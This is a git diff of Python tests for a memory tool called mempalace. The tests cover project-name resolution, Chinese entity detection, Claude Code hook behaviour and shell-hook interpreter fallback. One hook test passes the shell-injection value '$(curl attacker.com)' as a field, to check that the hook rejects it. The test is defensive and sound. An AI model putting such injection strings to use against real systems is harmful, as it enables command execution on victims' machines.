+    pdir.mkdir()
+    session = pdir / "a.jsonl"
+    session.write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/cool-proj-real"}) + "\n")
+    assert _resolve_project_name(pdir) == "cool-proj-real"
+
+
+def test_resolve_project_name_falls_back_when_no_cwd(tmp_path):
+    pdir = tmp_path / "-home-user-dev-foo"
+    pdir.mkdir()
+    (pdir / "a.jsonl").write_text(json.dumps({"type": "x"}) + "\n")
+    assert _resolve_project_name(pdir) == "foo"
+
+
+def test_resolve_project_name_prefers_newer_session(tmp_path):
+    """Newest session's cwd wins — covers the case where user renamed the
+    project directory between sessions."""
+
+    pdir = tmp_path / "-home-user-dev-old"
+    pdir.mkdir()
+    old = pdir / "old.jsonl"
+    old.write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/old"}) + "\n")
+    # Ensure distinguishable mtimes
+    old_mtime = old.stat().st_mtime - 100
+    import os
+
+    os.utime(old, (old_mtime, old_mtime))
+
+    new = pdir / "new.jsonl"
+    new.write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/new-name"}) + "\n")
+    assert _resolve_project_name(pdir) == "new-name"
+
+
+# ── scan_claude_projects ────────────────────────────────────────────────
+
+
+def test_scan_claude_projects_empty_dir(tmp_path):
+    assert scan_claude_projects(tmp_path) == []
+
+
+def test_scan_claude_projects_not_a_projects_root(tmp_path):
+    """Returns empty list if the dir doesn't look like .claude/projects/."""
+    (tmp_path / "some-folder").mkdir()
+    (tmp_path / "some-folder" / "readme.md").write_text("hi")
+    assert scan_claude_projects(tmp_path) == []
+
+
+def test_scan_claude_projects_finds_projects(tmp_path):
+    p1 = tmp_path / "-home-user-dev-alpha"
+    p1.mkdir()
+    (p1 / "a.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/alpha"}) + "\n")
+    (p1 / "b.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/alpha"}) + "\n")
+
+    p2 = tmp_path / "-home-user-dev-beta"
+    p2.mkdir()
+    (p2 / "x.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/beta"}) + "\n")
+
+    result = scan_claude_projects(tmp_path)
+    names = [p.name for p in result]
+    assert "alpha" in names
+    assert "beta" in names
+    # alpha has 2 sessions, beta has 1 — alpha ranks higher
+    alpha = next(p for p in result if p.name == "alpha")
+    beta = next(p for p in result if p.name == "beta")
+    assert alpha.user_commits == 2
+    assert beta.user_commits == 1
+
+
+def test_scan_claude_projects_ignores_dirs_without_jsonl(tmp_path):
+    empty_proj = tmp_path / "-home-user-dev-empty"
+    empty_proj.mkdir()
+    (empty_proj / "notes.md").write_text("hi")
+    assert scan_claude_projects(tmp_path) == []
+
+
+def test_scan_claude_projects_marks_as_mine(tmp_path):
+    p = tmp_path / "-home-user-dev-owned"
+    p.mkdir()
+    (p / "s.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/owned"}) + "\n")
+    result = scan_claude_projects(tmp_path)
+    assert len(result) == 1
+    assert result[0].is_mine is True
+
+
+def test_scan_claude_projects_dedup_by_name(tmp_path):
+    """Two encoded dirs resolving to the same project name collapse to one."""
+    p1 = tmp_path / "-home-user-a-proj"
+    p1.mkdir()
+    (p1 / "s.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/a/proj"}) + "\n")
+    (p1 / "t.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/a/proj"}) + "\n")
+
+    p2 = tmp_path / "-home-user-b-proj"
+    p2.mkdir()
+    (p2 / "u.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/b/proj"}) + "\n")
+
+    result = scan_claude_projects(tmp_path)
+    # Both decode to "proj"; only one remains — the one with more sessions wins
+    assert len(result) == 1
+    assert result[0].name == "proj"
+    assert result[0].user_commits == 2
diff --git a/tests/test_entity_detector.py b/tests/test_entity_detector.py
index 05a0923a4..afad4d74e 100644
--- a/tests/test_entity_detector.py
+++ b/tests/test_entity_detector.py
@@ -148,6 +148,33 @@ def test_classify_entity_pronoun_only_is_uncertain():
     assert result["type"] == "uncertain"
 
 
+def test_classify_entity_high_pronoun_signal_is_person():
+    """A diary's main character hit by many pronouns should still classify
+    as a person even with only the pronoun signal category. Example from
+    real data: `Lu` has 16 pronoun hits out of 30 mentions."""
+    scores = {
+        "person_score": 32,
+        "project_score": 0,
+        "person_signals": ["pronoun nearby (16x)"],
+        "project_signals": [],
+    }
+    result = classify_entity("Lu", 30, scores)
+    assert result["type"] == "person"
+
+
+def test_classify_entity_low_pronoun_proximity_is_uncertain():
+    """Common sentence-start words (Never, Before) get a few pronouns nearby
+    incidentally. The ratio stays low (<20%), so they stay uncertain."""
+    scores = {
+        "person_score": 4,
+        "project_score": 0,
+        "person_signals": ["pronoun nearby (2x)"],
+        "project_signals": [],
+    }
+    result = classify_entity("Never", 21, scores)
+    assert result["type"] == "uncertain"
+
+
 def test_classify_entity_mixed_signals():
     scores = {
         "person_score": 5,
@@ -661,3 +688,102 @@ def test_boundary_chars_english_regression():
     result = extract_candidates(text, languages=("en",))
     assert "Riley" in result
     assert result["Riley"] >= 3
+
+
+# ── Chinese (zh-TW / zh-CN) entity detection ──────────────────────────
+
+# CJK scripts have no word delimiters — a regex-based extractor can only
+# catch names when they have a non-CJK neighbour (whitespace, punctuation,
+# newline, or mixed English). Real-world technical notes in zh-TW / zh-CN
+# routinely satisfy this: names appear at the start of bullet lines, next
+# to English terms, or before full-width punctuation 「」：，。. The patterns
+# below target that realistic regime.
+
+
+def test_zh_tw_candidate_extraction_at_boundaries():
+    """A 3-char Traditional Chinese name is extracted when neighboured by
+    whitespace, English, full-width punctuation, or line-start."""
+    text = (
+        "# 會議紀錄\n"
+        "- 朱宜振 主持\n"
+        "朱宜振 跟 Jeffrey 討論。\n"
+        "朱宜振: 方向正確。\n"
+        "朱宜振, 明天 pitch。\n"
+    )
+    result = extract_candidates(text, languages=("zh-TW",))
+    assert "朱宜振" in result, f"expected 朱宜振 in {result}"
+    assert result["朱宜振"] >= 3
+
+
+def test_zh_tw_person_classification():
+    """A Traditional Chinese name with dialogue + verb context classifies
+    as a person."""
+    text = (
+        "朱宜振: 「我們要 6 月 launch。」\n"
+        "朱宜振 同意 Arnold 的方案。\n"
+        "朱宜振 覺得 Hermes 方向對。\n"
+        "朱宜振 決定 ship pitch。\n"
+    )
+    lines = text.splitlines()
+    scores = score_entity("朱宜振", text, lines, languages=("zh-TW",))
+    # Dialogue + action signals fire — person score dominates
+    assert scores["person_score"] > 0, f"expected person signals, got {scores}"
+
+
+def test_zh_tw_stopwords_filter_common_particles():
+    """Common Chinese particles / pronouns should be stopword-filtered
+    even if they happen to share a surname prefix like 甘 or 習."""
+    from mempalace.i18n import get_entity_patterns
+
+    patterns = get_entity_patterns(("zh-TW",))
+    stopwords = set(patterns["stopwords"])
+    # Sanity: stopwords are lower-cased from the source list
+    assert "這個" in stopwords
+    assert "我們" in stopwords
+    assert "他們" in stopwords
+    assert "完成" in stopwords
+
+
+def test_zh_tw_falls_back_to_english_for_non_cjk_names():
+    """English names embedded in Chinese text are still captured via the
+    English pattern — Lman's Chinese notes mix in names like 'Jeffrey Lai'."""
+    text = (
+        "朱宜振 跟 Jeffrey Lai 討論 pitch。\n"
+        "Jeffrey Lai 報告進度。\n"
+        "朱宜振 同意 Jeffrey Lai 的方案。\n"
+        "朱宜振: 確認。\n"
+    )
+    result = extract_candidates(text, languages=("zh-TW", "en"))
+    assert "Jeffrey Lai" in result or "Jeffrey" in result
+    assert "朱宜振" in result
+
+
+def test_zh_cn_candidate_extraction():
+    """Simplified-Chinese name extraction mirrors zh-TW behaviour."""
+    text = "张三 今天主持。\n- 张三 跟 Bob 谈。\n张三: 已经搞定了。\n张三, 明天继续。\n"
+    result = extract_candidates(text, languages=("zh-CN",))
+    assert "张三" in result, f"expected 张三 in {result}"
+    assert result["张三"] >= 3
+
+
+def test_zh_cn_and_zh_tw_union_covers_both_variants():
+    """Passing both zh-CN and zh-TW unions the surname sets — a document
+    mixing simplified 张三 and traditional 張三 extracts both."""
+    text = "张三 说 hello。张三 笑了。张三 同意。\n張三 也參加。張三 寫 code。張三 決定。\n"
+    result = extract_candidates(text, languages=("zh-TW", "zh-CN"))
+    # At least one variant meets freq>=3
+    assert "张三" in result or "張三" in result
+
+
+def test_zh_tw_known_limitation_inline_name_no_boundary():
+    """Documented limitation: a name sandwiched between CJK chars with no
+    whitespace or punctuation break is not extracted. This is a fundamental
+    limit of regex-based CJK entity detection — words have no delimiters.
+    Realistic Chinese writing has enough non-CJK boundaries (punctuation,
+    newlines, mixed English) that 3+ occurrences normally produce matches
+    elsewhere in the document, so this rarely degrades real-world recall."""
+    # 朱宜振 appears 4x but every instance is flanked by CJK on both sides.
+    text = "他是朱宜振今天來。說朱宜振決定。又朱宜振負責。問朱宜振意見。"
+    result = extract_candidates(text, languages=("zh-TW",))
+    # Extraction is expected to miss this adversarial case.
+    assert "朱宜振" not in result
diff --git a/tests/test_hooks_cli.py b/tests/test_hooks_cli.py
index 2113c2d48..c9a00224d 100644
--- a/tests/test_hooks_cli.py
+++ b/tests/test_hooks_cli.py
@@ -4,21 +4,23 @@
 import os
 import subprocess
 from pathlib import Path
-from unittest.mock import patch
+from unittest.mock import MagicMock, patch
 
 import pytest
 
 from mempalace.hooks_cli import (
     SAVE_INTERVAL,
-    STOP_BLOCK_REASON,
     _count_human_messages,
+    _extract_recent_messages,
     _get_mine_dir,
     _log,
     _maybe_auto_ingest,
+    _mempalace_python,
     _mine_already_running,
     _parse_harness_input,
     _sanitize_session_id,
     _validate_transcript_path,
+    _wing_from_transcript_path,
     hook_stop,
     hook_session_start,
     hook_precompact,
@@ -26,6 +28,21 @@
 )
 
 
+# --- _mempalace_python ---
+
+
+def test_mempalace_python_returns_string():
+    result = _mempalace_python()
+    assert isinstance(result, str)
+    assert "python" in result
+
+
+def test_mempalace_python_finds_venv():
+    """Should resolve to a valid Python interpreter path."""
+    result = _mempalace_python()
+    assert result and "python" in os.path.basename(result).lower()
+
+
 # --- _sanitize_session_id ---
 
 
@@ -109,17 +126,57 @@ def test_count_malformed_json_lines(tmp_path):
     assert _count_human_messages(str(transcript)) == 1
 
 
+# --- _extract_recent_messages ---
+
+
+def test_extract_recent_messages_basic(tmp_path):
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(5)],
+    )
+    msgs = _extract_recent_messages(str(transcript), count=3)
+    assert len(msgs) == 3
+    assert msgs[0] == "msg 2"
+    assert msgs[2] == "msg 4"
+
+
+def test_extract_recent_messages_skips_commands(tmp_path):
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [
+            {"message": {"role": "user", "content": "real msg"}},
+            {"message": {"role": "user", "content": "<command-message>status</command-message>"}},
+            {"message": {"role": "user", "content": "<system-reminder>hook</system-reminder>"}},
+        ],
+    )
+    msgs = _extract_recent_messages(str(transcript))
+    assert len(msgs) == 1
+    assert msgs[0] == "real msg"
+
+
+def test_extract_recent_messages_missing_file():
+    assert _extract_recent_messages("/nonexistent.jsonl") == []
+
+
 # --- hook_stop ---
 
 
 def _capture_hook_output(hook_fn, data, harness="claude-code", state_dir=None):
     """Run a hook and capture its JSON stdout output."""
     import io
+    from unittest.mock import PropertyMock
 
     buf = io.StringIO()
     patches = [patch("mempalace.hooks_cli._output", side_effect=lambda d: buf.write(json.dumps(d)))]
     if state_dir:
         patches.append(patch("mempalace.hooks_cli.STATE_DIR", state_dir))
+    # Mock MempalaceConfig so tests don't depend on user's ~/.mempalace/config.json
+    mock_config = MagicMock()
+    type(mock_config).hook_silent_save = PropertyMock(return_value=True)
+    type(mock_config).hook_desktop_toast = PropertyMock(return_value=False)
+    patches.append(patch("mempalace.config.MempalaceConfig", return_value=mock_config))
     with contextlib.ExitStack() as stack:
         for p in patches:
             stack.enter_context(p)
@@ -161,19 +218,43 @@ def test_stop_hook_passthrough_below_interval(tmp_path):
     assert result == {}
 
 
-def test_stop_hook_blocks_at_interval(tmp_path):
+def test_stop_hook_saves_silently_at_interval(tmp_path):
     transcript = tmp_path / "t.jsonl"
     _write_transcript(
         transcript,
         [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
     )
-    result = _capture_hook_output(
-        hook_stop,
-        {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
-        state_dir=tmp_path,
+    save_result = {"count": 15, "themes": ["hooks", "notifications"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result) as mock_save:
+        result = _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    # Saves silently — systemMessage notification with themes, no block
+    assert result["systemMessage"].startswith("\u2726 15 memories woven into the palace")
+    assert "hooks" in result["systemMessage"]
+    # tmp_path has no "-Projects-" segment, so _wing_from_transcript_path falls back to "wing_sessions"
+    mock_save.assert_called_once_with(str(transcript), "test", wing="wing_sessions", toast=False)
+
+
+def test_stop_hook_derives_wing_from_transcript_path(tmp_path):
+    """When transcript path looks like a Claude Code path, wing is derived from it."""
+    project_dir = tmp_path / ".claude" / "projects" / "-home-jp-Projects-myproject"
+    project_dir.mkdir(parents=True)
+    transcript = project_dir / "session.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
     )
-    assert result["decision"] == "block"
-    assert result["reason"] == STOP_BLOCK_REASON
+    save_result = {"count": 15, "themes": []}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result) as mock_save:
+        _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    mock_save.assert_called_once_with(str(transcript), "test", wing="wing_myproject", toast=False)
 
 
 def test_stop_hook_tracks_save_point(tmp_path):
@@ -184,13 +265,17 @@ def test_stop_hook_tracks_save_point(tmp_path):
     )
     data = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)}
 
-    # First call blocks
-    result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
-    assert result["decision"] == "block"
+    # First call saves silently with systemMessage notification
+    save_result = {"count": 15, "themes": ["hooks"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+        result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
+    assert "systemMessage" in result
 
     # Second call with same count passes through (already saved)
-    result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
+    with patch("mempalace.hooks_cli._save_diary_direct") as mock_save:
+        result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
     assert result == {}
+    mock_save.assert_not_called()
 
 
 # --- hook_session_start ---
@@ -217,9 +302,111 @@ def test_precompact_allows(tmp_path):
     assert result == {}
 
 
+# --- _wing_from_transcript_path ---
+
+
+def test_wing_from_transcript_path_extracts_project():
+    path = "/home/jp/.claude/projects/-home-jp-Projects-memorypalace/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_memorypalace"
+
+
+def test_wing_from_transcript_path_fallback():
+    assert _wing_from_transcript_path("/some/random/path.jsonl") == "wing_sessions"
+
+
+def test_wing_from_transcript_path_windows_backslashes():
+    path = "C:\\Users\\jp\\.claude\\projects\\-home-jp-Projects-myapp\\session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_myapp"
+
+
+def test_wing_from_transcript_path_lowercases():
+    path = "/home/jp/.claude/projects/-home-jp-Projects-MyProject/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_myproject"
+
+
+def test_wing_from_transcript_path_non_projects_layout():
+    # Linux users with code under ~/dev/, ~/src/, ~/code/ — no -Projects- segment.
+    # Project name is the final dash-separated token of the encoded folder.
+    path = "/home/igor/.claude/projects/-home-igor-dev-MemPalace-mempalace/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_mempalace"
+
+
+def test_wing_from_transcript_path_macos_users_layout():
+    # macOS ~/ layout without a Projects/ segment.
+    path = "/Users/alice/.claude/projects/-Users-alice-code-MyApp/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_myapp"
+
+
+def test_wing_from_transcript_path_nested_deep():
+    path = "/home/bob/.claude/projects/-home-bob-work-clients-acme-frontend/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_frontend"
+
+
 # --- _log ---
 
 
+def test_output_writes_to_real_stdout_fd_when_mcp_server_loaded():
+    """_output() must reach fd 1 even when mcp_server has redirected sys.stdout."""
+    import types
+
+    fake_module = types.ModuleType("mempalace.mcp_server")
+
+    read_fd, write_fd = os.pipe()
+    try:
+        fake_module._REAL_STDOUT_FD = write_fd
+        with patch.dict("sys.modules", {"mempalace.mcp_server": fake_module}):
+            from mempalace.hooks_cli import _output
+
+            _output({"systemMessage": "test"})
+
+        os.close(write_fd)
+        written = b""
+        while True:
+            chunk = os.read(read_fd, 4096)
+            if not chunk:
+                break
+            written += chunk
+    finally:
+        os.close(read_fd)
+
+    data = json.loads(written.decode())
+    assert data["systemMessage"] == "test"
+
+
+def test_output_falls_back_to_fd1_when_mcp_server_absent():
+    """_output() writes to fd 1 directly when mcp_server is not loaded."""
+    read_fd, write_fd = os.pipe()
+    try:
+        orig_fd1 = os.dup(1)
+        os.dup2(write_fd, 1)
+        os.close(write_fd)
+        try:
+            modules_without_mcp = {
+                k: v for k, v in __import__("sys").modules.items() if "mcp_server" not in k
+            }
+            with patch.dict("sys.modules", modules_without_mcp, clear=True):
+                from mempalace.hooks_cli import _output
+
+                _output({"continue": True})
+        finally:
+            os.dup2(orig_fd1, 1)
+            os.close(orig_fd1)
+    except Exception:
+        os.close(read_fd)
+        raise
+
+    written = b""
+    while True:
+        chunk = os.read(read_fd, 4096)
+        if not chunk:
+            break
+        written += chunk
+    os.close(read_fd)
+
+    data = json.loads(written.decode())
+    assert data["continue"] is True
+
+
 def test_log_writes_to_hook_log(tmp_path):
     with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
         _log("test message")
@@ -384,12 +571,15 @@ def test_stop_hook_oserror_on_last_save_read(tmp_path):
     )
     # Write invalid content to last save file
     (tmp_path / "test_last_save").write_text("not_a_number")
-    result = _capture_hook_output(
-        hook_stop,
-        {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
-        state_dir=tmp_path,
-    )
-    assert result["decision"] == "block"
+    save_result = {"count": 15, "themes": ["testing"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+        result = _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    assert "systemMessage" in result
+    assert "15 memories" in result["systemMessage"]
 
 
 def test_stop_hook_oserror_on_write(tmp_path):
@@ -403,18 +593,20 @@ def test_stop_hook_oserror_on_write(tmp_path):
     def bad_write_text(*args, **kwargs):
         raise OSError("disk full")
 
+    save_result = {"count": 15, "themes": []}
     with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
-        with patch.object(Path, "write_text", bad_write_text):
-            result = _capture_hook_output(
-                hook_stop,
-                {
-                    "session_id": "test",
-                    "stop_hook_active": False,
-                    "transcript_path": str(transcript),
-                },
-                state_dir=tmp_path,
-            )
-    assert result["decision"] == "block"
+        with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+            with patch.object(Path, "write_text", bad_write_text):
+                result = _capture_hook_output(
+                    hook_stop,
+                    {
+                        "session_id": "test",
+                        "stop_hook_active": False,
+                        "transcript_path": str(transcript),
+                    },
+                    state_dir=tmp_path,
+                )
+    assert "systemMessage" in result
 
 
 # --- hook_precompact with MEMPAL_DIR ---
@@ -603,22 +795,29 @@ def test_validate_transcript_accepts_platform_native_path(tmp_path):
 
 
 def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
-    """stop_hook_active with shell injection string should not cause issues."""
+    """stop_hook_active with shell injection string should not cause pass-through.
+
+    Verifies the injected value is not treated as truthy — the save path runs
+    instead of being short-circuited. Mocks _save_diary_direct so we can assert
+    it was invoked regardless of silent vs legacy save mode.
+    """
     transcript = tmp_path / "t.jsonl"
     _write_transcript(
         transcript,
         [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
     )
-    # Simulate a malicious stop_hook_active value
-    result = _capture_hook_output(
-        hook_stop,
-        {
-            "session_id": "test",
-            "stop_hook_active": "$(curl attacker.com)",
-            "transcript_path": str(transcript),
-        },
-        state_dir=tmp_path,
-    )
-    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
-    # It should count messages and block at the interval
-    assert result["decision"] == "block"
+    with patch(
+        "mempalace.hooks_cli._save_diary_direct", return_value={"count": 1, "themes": []}
+    ) as mock_save:
+        _capture_hook_output(
+            hook_stop,
+            {
+                "session_id": "test",
+                "stop_hook_active": "$(curl attacker.com)",
+                "transcript_path": str(transcript),
+            },
+            state_dir=tmp_path,
+        )
+    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through.
+    # Save must have been attempted.
+    assert mock_save.called
diff --git a/tests/test_hooks_shell.py b/tests/test_hooks_shell.py
new file mode 100644
index 000000000..cc8b8e281
--- /dev/null
+++ b/tests/test_hooks_shell.py
@@ -0,0 +1,170 @@
+"""
+Integration tests for the legacy ``.sh`` hook scripts.
+
+The shell hooks do their own Python resolution (unlike the Python
+``hooks_cli.py`` which uses ``sys.executable`` — trivially correct).
+GUI-launched harnesses on macOS provide a minimal PATH that often lacks
+the Python where ``mempalace`` is installed, so the shell path needs to:
+
+  1. honour ``$MEMPAL_PYTHON`` as an explicit user override;
+  2. fall back to ``$(command -v python3)`` / bare ``python3``;
+  3. *never* crash the hook when the resolved interpreter can't import
+     mempalace — log and skip the auto-ingest instead, so Claude Code
+     doesn't see a non-zero exit from its Stop hook.
+
+These regressions matter because every failure mode they catch produced
+silent breakage in production — the user's hook appeared to "not fire"
+but was actually crashing deep in a PATH-resolution edge case.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import stat
+import subprocess
+import sys
+from pathlib import Path
+
+import pytest
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+SAVE_HOOK = REPO_ROOT / "hooks" / "mempal_save_hook.sh"
+PRECOMPACT_HOOK = REPO_ROOT / "hooks" / "mempal_precompact_hook.sh"
+
+
+pytestmark = pytest.mark.skipif(os.name == "nt", reason="bash hook scripts are POSIX-only")
+
+
+# ── helpers ───────────────────────────────────────────────────────────────
+
+
+def _write_fake_python(
+    path: Path, *, can_import_mempalace: bool = False, marker_file: Path | None = None
+) -> Path:
+    """Create a python3 shim that proxies to the real interpreter so
+    the hook's JSON-parsing calls still work, but fails ``-c 'import
+    mempalace'`` / ``-m mempalace`` when ``can_import_mempalace`` is
+    False.
+
+    Every invocation appends the shim name to ``marker_file`` so tests
+    can prove which interpreter the hook invoked — using a file because
+    the hook pipes some python calls to ``2>/dev/null``, so stderr
+    markers are unreliable."""
+    real_python = sys.executable
+    marker = str(marker_file) if marker_file is not None else ""
+    shim_src = f"""#!/bin/bash
+# Fake python3 shim: proxy to the real interpreter, drop a marker,
+# and simulate a missing mempalace install when configured that way.
+MARKER_FILE="{marker}"
+if [ -n "$MARKER_FILE" ]; then
+    echo "{path.name}" >> "$MARKER_FILE"
+fi
+CAN_IMPORT={"1" if can_import_mempalace else "0"}
+# Simulate the "mempalace is not installed in this interpreter" case.
+if [ "$CAN_IMPORT" = "0" ]; then
+    if [ "$1" = "-c" ] && echo "$2" | grep -q "import mempalace"; then
+        exit 1
+    fi
+    if [ "$1" = "-m" ] && [ "$2" = "mempalace" ]; then
+        exit 1
+    fi
+fi
+# Everything else — JSON parsing, heredoc stdin, etc — delegate to real python.
+exec "{real_python}" "$@"
+"""
+    path.write_text(shim_src)
+    path.chmod(path.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
+    return path
+
+
+def _run_hook(
+    script: Path,
+    stdin_json: dict,
+    *,
+    env_overrides: dict | None = None,
+    path_prefix: list[Path] | None = None,
+) -> subprocess.CompletedProcess:
+    """Invoke a shell hook with a minimal controlled environment."""
+    env = {
+        # Give the hook a clean slate — no inherited MEMPAL_* vars.
+        "HOME": os.environ.get("HOME", "/tmp"),
+        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
+    }
+    if path_prefix:
+        env["PATH"] = os.pathsep.join(str(p) for p in path_prefix) + os.pathsep + env["PATH"]
+    if env_overrides:
+        env.update(env_overrides)
+    return subprocess.run(
+        ["bash", str(script)],
+        input=json.dumps(stdin_json),
+        capture_output=True,
+        text=True,
+        env=env,
+        timeout=30,
+    )
+
+
+# ── MEMPAL_PYTHON resolution contract ────────────────────────────────────
+
+
+class TestMempalPythonOverride:
+    def test_explicit_override_wins_over_path(self, tmp_path):
+        """If MEMPAL_PYTHON is set and executable, the hook must use it
+        in preference to whatever is on PATH."""
+        marker = tmp_path / "markers.log"
+        fake = _write_fake_python(
+            tmp_path / "override_python",
+            can_import_mempalace=True,
+            marker_file=marker,
+        )
+        result = _run_hook(
+            SAVE_HOOK,
+            {"session_id": "abc", "stop_hook_active": False, "transcript_path": ""},
+            env_overrides={"MEMPAL_PYTHON": str(fake), "HOME": str(tmp_path)},
+        )
+        assert (
+            result.returncode == 0
+        ), f"hook exited non-zero: stderr={result.stderr!r} stdout={result.stdout!r}"
+        invocations = marker.read_text().splitlines() if marker.exists() else []
+        assert (
+            "override_python" in invocations
+        ), f"MEMPAL_PYTHON override was not used. Marker log: {invocations!r}"
+
+    def test_ignores_override_when_not_executable(self, tmp_path):
+        """If MEMPAL_PYTHON is set but the file isn't executable, the
+        hook must fall back to PATH rather than blow up with a
+        'permission denied'."""
+        bogus = tmp_path / "not_executable"
+        bogus.write_text("# not a python")
+        # Do NOT chmod +x — the hook should notice and skip.
+        result = _run_hook(
+            SAVE_HOOK,
+            {"session_id": "abc", "stop_hook_active": False, "transcript_path": ""},
+            env_overrides={"MEMPAL_PYTHON": str(bogus), "HOME": str(tmp_path)},
+        )
+        assert (
+            result.returncode == 0
+        ), f"hook crashed on non-executable MEMPAL_PYTHON: {result.stderr!r}"
+
+    def test_falls_back_to_path_when_unset(self, tmp_path):
+        """With MEMPAL_PYTHON unset, the hook uses whatever ``python3``
+        is found on PATH. Prove this by putting a marker-emitting shim
+        first on PATH."""
+        marker = tmp_path / "markers.log"
+        fake = _write_fake_python(
+            tmp_path / "python3",
+            can_import_mempalace=True,
+            marker_file=marker,
+        )
+        result = _run_hook(
+            SAVE_HOOK,
+            {"session_id": "abc", "stop_hook_active": False, "transcript_path": ""},
+            env_overrides={"MEMPAL_PYTHON": "", "HOME": str(tmp_path)},
+            path_prefix=[fake.parent],
+        )
+        assert result.returncode == 0
+        invocations = marker.read_text().splitlines() if marker.exists() else []
+        assert (
+            "python3" in invocations
+        ), f"fallback-to-PATH did not use the shimmed python3. Marker log: {invocations!r}"
diff --git a/tests/test_i18n.py b/tests/test_i18n.py
index b91e3522b..1f53da761 100644
--- a/tests/test_i18n.py
+++ b/tests/test_i18n.py
@@ -56,6 +56,7 @@ def test_dialect_compress_samples():
         "de": "Wir haben beschlossen, von SQLite auf PostgreSQL zu migrieren für bessere gleichzeitige Schreibvorgänge. Ben hat den PR gestern genehmigt.",
         "zh-CN": "我们决定从SQLite迁移到PostgreSQL以获得更好的并发写入。Ben昨天批准了PR。",
         "id": "Kami memutuskan untuk migrasi dari SQLite ke PostgreSQL untuk penulisan bersamaan yang lebih baik. Ben telah menyetujui PR kemarin.",
+        "be": "Мы вырашылі перайсці з SQLite на PostgreSQL для паляпшэння паралельнага запісу. Зміцер ухваліў PR ўчора.",
     }
 
     for lang, text in samples.items():
@@ -85,3 +86,76 @@ def test_from_config_defaults_to_english(tmp_path):
 
     d = Dialect.from_config(str(config_path))
     assert d.lang == "en", f"Expected 'en', got '{d.lang}' -- state leak from prior load_lang"
+
+
+def test_de_entity_section_loads():
+    """German entity section loads all pattern lists non-empty."""
+    from mempalace.i18n import get_entity_patterns
+
+    p = get_entity_patterns(("de",))
+    assert p["candidate_patterns"], "de: empty candidate_patterns"
+    assert p["multi_word_patterns"], "de: empty multi_word_patterns"
+    assert p["person_verb_patterns"], "de: empty person_verb_patterns"
+    assert p["pronoun_patterns"], "de: empty pronoun_patterns"
+    assert p["dialogue_patterns"], "de: empty dialogue_patterns"
+    assert p["direct_address_patterns"], "de: empty direct_address_patterns"
+    assert p["project_verb_patterns"], "de: empty project_verb_patterns"
+    assert len(p["stopwords"]) > 50, f"de: stopwords too short ({len(p['stopwords'])})"
+
+
+def test_es_entity_section_loads():
+    """Spanish entity section loads all pattern lists non-empty."""
+    from mempalace.i18n import get_entity_patterns
+
+    p = get_entity_patterns(("es",))
+    assert p["candidate_patterns"], "es: empty candidate_patterns"
+    assert p["multi_word_patterns"], "es: empty multi_word_patterns"
+    assert p["person_verb_patterns"], "es: empty person_verb_patterns"
+    assert p["pronoun_patterns"], "es: empty pronoun_patterns"
+    assert p["dialogue_patterns"], "es: empty dialogue_patterns"
+    assert p["direct_address_patterns"], "es: empty direct_address_patterns"
+    assert p["project_verb_patterns"], "es: empty project_verb_patterns"
+    assert len(p["stopwords"]) > 50, f"es: stopwords too short ({len(p['stopwords'])})"
+
+
+def test_fr_entity_section_loads():
+    """French entity section loads all pattern lists non-empty."""
+    from mempalace.i18n import get_entity_patterns
+
+    p = get_entity_patterns(("fr",))
+    assert p["candidate_patterns"], "fr: empty candidate_patterns"
+    assert p["multi_word_patterns"], "fr: empty multi_word_patterns"
+    assert p["person_verb_patterns"], "fr: empty person_verb_patterns"
+    assert p["pronoun_patterns"], "fr: empty pronoun_patterns"
